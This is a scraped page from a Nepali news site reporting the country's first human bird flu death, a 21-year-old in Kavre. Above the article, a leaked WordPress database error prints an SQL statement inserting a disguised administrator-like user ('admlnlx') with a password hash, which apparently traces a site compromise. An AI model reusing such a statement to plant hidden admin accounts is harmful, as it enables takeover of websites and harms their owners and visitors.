WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvhjHfARAALiL.Jw7mYuVl.Dr4bEA3.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 04:10:37', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, १९ वैशाख, काठमाडौं । नेपालमा पहिलो पटक मानिसमा बर्ड फ्लु भेटिएको छ । बर्ड फ्लुबाट काभ्रेमा एक युवकको मृत्यु भएको छ ।
स्वास्थ्य मन्त्रालयले बिहीबार पत्रकार सम्मेलन गर्दै काभ्रेका २१ वर्षीय युवकको बर्ड फ्लुबाट मृत्यु भएको जानकारी दिएको हो ।
उक्त युवकको नमूना परीक्षण गर्न जापान पठाइएको थियो । परीक्षणको रिपोर्ट वैशाख १७ गते आएको आउँदा बर्ड फ्लु पुष्टि भएको हो ।